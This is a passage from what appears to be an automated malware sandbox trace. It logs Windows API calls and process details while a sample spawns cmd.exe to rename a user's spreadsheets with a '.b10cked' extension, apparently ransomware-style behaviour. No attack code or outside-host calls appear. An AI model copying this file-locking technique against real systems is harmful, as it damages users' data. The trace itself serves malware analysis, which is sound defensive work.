_String2="CMDEXTVERSION") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.708] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.708] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.708] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.708] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.708] GetEnvironmentStringsW () returned 0x822b8* [0130.708] FreeEnvironmentStringsW (penv=0x822b8) returned 1 [0130.708] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.708] 
GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.708] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.708] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.708] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.708] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.708] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.708] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.708] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fac0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fac0, lpFilePart=0x26fabc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fabc*="Desktop") returned 0x18 [0130.709] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f83c | out: lpFindFileData=0x26f83c) returned 0x7fff8 [0130.709] FindClose (in: hFindFile=0x7fff8 | out: hFindFile=0x7fff8) returned 1 [0130.709] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.709] SetCurrentDirectoryW 
(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.709] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.709] GetEnvironmentStringsW () returned 0x82ad8* [0130.710] FreeEnvironmentStringsW (penv=0x82ad8) returned 1 [0130.710] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.710] GetConsoleOutputCP () returned 0x1b5 [0130.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.710] GetUserDefaultLCID () returned 0x409 [0130.710] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.710] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc00, cchData=128 | out: lpLCData="1") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 
[0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.711] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.711] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.712] GetConsoleTitleW (in: lpConsoleTitle=0x708d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.712] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.712] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.713] _wcsicmp (_String1="move", _String2=")") returned 68 [0130.713] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0130.713] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0130.713] _wcsicmp (_String1="IF", _String2="move") returned -4 [0130.713] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0130.713] _wcsicmp (_String1="REM", _String2="move") returned 5 [0130.713] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0130.716] GetConsoleTitleW (in: lpConsoleTitle=0x26f8f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.717] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="CD") returned 10 [0130.717] _wcsicmp (_String1="move", 
_String2="CHDIR") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="REN") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="SET") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="MD") returned 11 [0130.717] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0130.717] _wcsicmp (_String1="move", _String2="RD") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0130.717] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0130.717] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0130.717] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0130.717] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="VER") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0130.717] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0130.717] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0130.717] _wcsicmp (_String1="move", _String2="START") returned -6 [0130.717] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0130.717] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0130.717] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0130.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.719] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0130.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f6b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f6ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f6ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.719] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.720] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.720] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0130.720] _wcsicmp (_String1="BUW1GW~1.XLS", _String2=".") returned 52 [0130.720] _wcsicmp (_String1="BUW1GW~1.XLS", _String2="..") returned 52 [0130.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gw~1.xls")) returned 0x20 [0130.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", nBufferLength=0x104, lpBuffer=0x26f03c, lpFilePart=0x26f024 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", lpFilePart=0x26f024*="BUW1GW~1.XLS") returned 0x26 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0130.721] _wcsicmp (_String1="BUW1GW~1.XLS", _String2=".") returned 52 [0130.721] _wcsicmp (_String1="BUW1GW~1.XLS", _String2="..") returned 52 [0130.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gw~1.xls")) returned 0x20 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", nBufferLength=0x104, lpBuffer=0x26f4b8, lpFilePart=0x26f250 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", lpFilePart=0x26f250*="BUW1GW~1.XLS") returned 0x26 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.721] SetErrorMode (uMode=0x0) returned 0x0 [0130.721] SetErrorMode (uMode=0x1) returned 0x0 [0130.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f6c0, lpFilePart=0x26f250 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", lpFilePart=0x26f250*="bUW1gWS4k.xlsx.b10cked") returned 0x30 [0130.721] SetErrorMode (uMode=0x0) returned 0x1 [0130.831] SetLastError (dwErrCode=0x0) [0130.831] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx.b10cked")) returned 0xffffffff [0130.831] GetLastError () returned 0x2 [0130.831] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26ebcc, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebcc) returned 0x70ef8 [0130.831] FindNextFileW (in: hFindFile=0x70ef8, lpFindFileData=0x26ebcc | out: lpFindFileData=0x26ebcc) returned 0 [0130.832] GetLastError () returned 0x12 [0130.832] FindClose (in: hFindFile=0x70ef8 | out: hFindFile=0x70ef8) returned 1 [0130.832] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x81ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81ae0) returned 0x70ef8 [0130.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26ee64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", lpFilePart=0x0) returned 0x30 [0130.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx", nBufferLength=0x104, lpBuffer=0x26ee64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx", lpFilePart=0x0) returned 0x28 [0130.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx")) returned 0x20 [0130.833] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx.b10cked"), dwFlags=0x3) returned 1 [0130.833] FindClose (in: hFindFile=0x70ef8 | out: hFindFile=0x70ef8) returned 1 [0130.833] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ee18 | out: _Buffer=" 1") returned 9 [0130.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.833] GetFileType (hFile=0x7) returned 0x2 [0130.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eda4 | out: 
lpMode=0x26eda4) returned 1 [0130.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26edd8 | out: lpConsoleScreenBufferInfo=0x26edd8) returned 1 [0130.834] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0130.834] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ee18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0130.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26edfc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26edfc*=0x1a) returned 1 [0130.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.834] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.835] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.835] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.835] SetConsoleInputExeNameW () returned 0x1 [0130.835] GetConsoleOutputCP () returned 0x1b5 [0130.835] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.835] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.835] exit (_Code=0) Process: id = "99" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11568 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11569 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11570 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11571 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 11572 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11573 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11574 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11575 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11576 
start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 11577 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11598 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11599 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11600 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11601 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 11602 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 11603 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11604 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11605 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11606 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 11607 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11608 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11609 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11610 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11611 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11612 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11613 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11614 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11615 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 11616 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" 
filename = "" Region: id = 11617 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 11618 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11619 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11620 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 11621 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 156 os_tid = 0x42c [0130.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f964 | out: lpSystemTimeAsFileTime=0x16f964*(dwLowDateTime=0x87c089a0, dwHighDateTime=0x1d440a9)) [0130.555] GetCurrentProcessId () returned 0x248 [0130.555] GetCurrentThreadId () returned 0x42c [0130.555] GetTickCount () returned 0x29ae7 [0130.555] QueryPerformanceCounter (in: lpPerformanceCount=0x16f95c | out: lpPerformanceCount=0x16f95c*=18734473095) returned 1 [0130.556] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.556] __set_app_type (_Type=0x1) [0130.556] __p__fmode () returned 0x76b331f4 [0130.556] __p__commode () returned 0x76b331fc [0130.556] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.557] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.557] GetCurrentThreadId () returned 0x42c [0130.557] 